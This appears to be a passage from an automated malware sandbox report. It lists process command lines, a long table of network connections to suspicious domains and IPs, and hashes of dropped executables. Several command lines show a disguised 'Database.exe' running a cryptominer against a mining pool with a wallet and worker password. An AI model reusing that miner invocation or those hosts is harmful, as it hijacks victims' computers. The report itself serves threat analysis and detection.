C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3172 /prefetch:2
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --mojo-platform-channel-handle=1944 /prefetch:8
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --mojo-platform-channel-handle=3480 /prefetch:8
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
Network
| Country | Destination | Domain | Proto |
| N/A | 20.73.194.208:443 | tcp | |
| N/A | 40.126.31.8:443 | tcp | |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 20.189.118.208:80 | tcp | |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.166:443 | api.db-ip.com | tcp |
| N/A | 104.26.4.15:443 | api.db-ip.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 8.8.8.8:53 | i.spesgrt.com | udp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 8.8.8.8:53 | hockeybruinsteamshop.com | udp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 52.219.64.115:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 52.219.64.115:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 185.206.215.216:80 | tcp | |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 52.219.66.68:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.66.68:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 152.32.151.93:80 | 152.32.151.93 | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 31.13.71.36:443 | www.facebook.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 52.219.156.26:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.156.26:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.86.82:80 | swretjhwrtj.gq | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 185.230.143.48:14462 | tcp | |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 104.18.21.226:80 | crl.globalsign.com | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
| N/A | 52.222.137.218:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 52.222.137.218:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 52.219.158.26:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 104.18.20.226:80 | crl.globalsign.com | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 52.219.158.26:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.49.70.90:2080 | 185.49.70.90 | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 104.18.20.226:80 | crl.globalsign.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 172.67.178.16:443 | bestinternetstore.xyz | tcp |
| N/A | 135.181.123.52:12073 | tcp | |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 193.164.17.17:80 | heso-vpn.ug | tcp |
| N/A | 185.206.215.216:80 | tcp | |
| N/A | 193.164.17.17:80 | heso-vpn.ug | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 94.103.83.88:65136 | tcp | |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 52.219.62.119:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 52.219.62.119:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 62.172.138.35:80 | geo.netsupportsoftware.com | tcp |
| N/A | 104.192.141.1:443 | bitbucket.org | tcp |
| N/A | 95.181.152.223:52383 | tcp | |
| N/A | 52.216.207.171:443 | bbuseruploads.s3.amazonaws.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 94.103.83.88:65136 | tcp | |
| N/A | 8.8.8.8:53 | afleof21klg.top | udp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 52.216.207.171:443 | bbuseruploads.s3.amazonaws.com | tcp |
| N/A | 91.107.126.100:80 | afleof21klg.top | tcp |
| N/A | 91.107.126.100:80 | afleof21klg.top | tcp |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 52.178.182.73:443 | smartscreen-prod.microsoft.com | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 204.79.197.203:443 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 104.16.202.237:443 | www.mediafire.com | tcp |
| N/A | 2.22.22.210:443 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 199.91.155.72:443 | download2331.mediafire.com | tcp |
| N/A | 40.126.31.139:443 | tcp | |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 192.243.59.20:443 | www.profitabletrustednetwork.com | tcp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 192.243.59.12:443 | www.profitabletrustednetwork.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 2.18.105.186:80 | go.microsoft.com | tcp |
| N/A | 168.61.182.58:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 204.79.197.200:443 | tcp | |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 194.145.227.159:80 | 194.145.227.159 | tcp |
| N/A | 2.17.34.102:443 | tcp | |
| N/A | 2.17.34.102:443 | tcp | |
| N/A | 204.79.197.203:443 | tcp | |
| N/A | 2.22.22.225:443 | tcp | |
| N/A | 13.32.240.85:443 | tcp | |
| N/A | 52.142.114.2:443 | tcp | |
| N/A | 204.79.197.200:443 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.148.61:443 | source3.boys4dayz.com | tcp |
| N/A | 81.16.141.193:80 | tcp | |
| N/A | 104.21.29.4:80 | cache.uutww77.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 98.126.176.53:443 | vpn.maskvpn.org | tcp |
| N/A | 67.198.169.2:431 | tcp | |
| N/A | 131.253.33.203:443 | tcp | |
| N/A | 104.21.7.179:443 | mybrowserinfo.com | tcp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 2.17.34.102:443 | tcp | |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 2.22.147.50:443 | tcp | |
| N/A | 142.250.179.174:80 | www.google-analytics.com | tcp |
| N/A | 2.22.147.24:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 20.82.210.154:443 | tcp | |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 54.224.34.30:443 | paybiz.herokuapp.com | tcp |
| N/A | 23.51.123.27:80 | tl.symcd.com | tcp |
| N/A | 23.51.123.27:80 | tl.symcd.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 193.164.17.17:80 | heso-vpn.ug | tcp |
| N/A | 127.0.0.1:5985 | tcp | |
| N/A | 127.0.0.1:5985 | tcp |
Files
memory/4652-146-0x0000000004260000-0x000000000439F000-memory.dmp
memory/3028-149-0x0000000000000000-mapping.dmp
memory/4816-148-0x0000000000000000-mapping.dmp
memory/2500-147-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe
| MD5 | 2187ac1cdb84a5a172d51f50aa67f76a |
| SHA1 | 98dcaf5606c245d08f8ba6fdef95cd1e921a2624 |
| SHA256 | cb54b6471597a9417bcc042d0f0d6404518b647bd3757035a01e9de6aa109490 |
| SHA512 | ec0d1b7fe59d430213547e0651a92ebc38b4a57f7c4a30d60bc25306b407fd04e4427c93acb9c34df2e884b9c696cbf7da9ad44c90af25eb4922c72baa84a80e |
memory/2972-154-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
| MD5 | cfa84b10c7c5ff391859a425abae49e7 |
| SHA1 | 2aa794ec012ad2491b463c983b0a7b8a3beb72c4 |
| SHA256 | 07c1c45477b082547fe2b3ad9bea525ffca2aebc80bc6c96b1f263904db7fbd1 |
| SHA512 | f6b9ac777f9b357b4da4f5653f562631b55514516eb20c2fda63d85d15ed5d572e14887e5f0a10ebdc494188d2da3af7d53171159ef303719f12def0a4f8f5db |
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
| MD5 | cfa84b10c7c5ff391859a425abae49e7 |
| SHA1 | 2aa794ec012ad2491b463c983b0a7b8a3beb72c4 |
| SHA256 | 07c1c45477b082547fe2b3ad9bea525ffca2aebc80bc6c96b1f263904db7fbd1 |
| SHA512 | f6b9ac777f9b357b4da4f5653f562631b55514516eb20c2fda63d85d15ed5d572e14887e5f0a10ebdc494188d2da3af7d53171159ef303719f12def0a4f8f5db |
C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe
| MD5 | 7714deedb24c3dcfa81dc660dd383492 |
| SHA1 | 56fae3ab1186009430e175c73b914c77ed714cc0 |
| SHA256 | 435badbad2fc138245a4771a74ebb9075658e294d1bcfcf191ccea466eea825c |
| SHA512 | 2cf05ac9470ab4e6d487ec9e4d7ab36fb2c8ce1405dba01b58934778829c7c4db703818087e0c5fbffe6cf821dfa190427e1205530409359ace2ad416e781c58 |
